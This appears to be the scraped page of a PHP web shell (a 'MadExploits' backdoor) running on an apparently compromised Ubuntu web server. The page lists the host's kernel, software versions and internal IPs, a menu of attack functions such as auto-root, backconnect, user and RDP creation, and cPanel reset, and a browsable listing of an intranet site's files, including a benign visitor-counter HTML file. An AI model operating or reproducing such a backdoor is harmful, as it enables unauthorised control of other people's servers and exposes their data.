Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
intranetpage /
[ HOME SHELL ]
Name
Size
Permission
Action
akamreports
[ DIR ]
drwxr-x--x
blog
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-x--x
ddc26testbkp22126
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-x--x
fonts
[ DIR ]
drwxr-x--x
iiitdinternaldocs
[ DIR ]
drwxr-x--x
images
[ DIR ]
drwxr-x--x
js
[ DIR ]
drwxr-x--x
about-us.html
17.75
KB
-rwxr-x--x
akamreports.html
10.99
KB
-rwxr-x--x
contact-us.html
15.05
KB
-rwxr-x--x
count.php
3.04
KB
-rw-r--r--
counter.html
757
B
-rw-r--r--
email.php
916
B
-rwxr-x--x
index-mtechdata.html
27.76
KB
-rwxr-x--x
index.html
42.47
KB
-rwxrwxrwx
newsletters.html
14.97
KB
-rwxr-x--x
services.html
13.42
KB
-rwxr-x--x
tea.html
20.76
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : counter.html
<!DOCTYPE html> <html> <head> <title>Local Storage Visitor Counter</title> </head> <body> <h1>Welcome!</h1> <p>You are visitor number: <span id="visitCount"></span></p> <script> document.addEventListener('DOMContentLoaded', () => { let visitCount = localStorage.getItem('page_view'); if (visitCount) { visitCount = Number(visitCount) + 1; } else { visitCount = 1; } localStorage.setItem('page_view', visitCount); document.getElementById('visitCount').textContent = visitCount; }); </script> </body> </html>
Close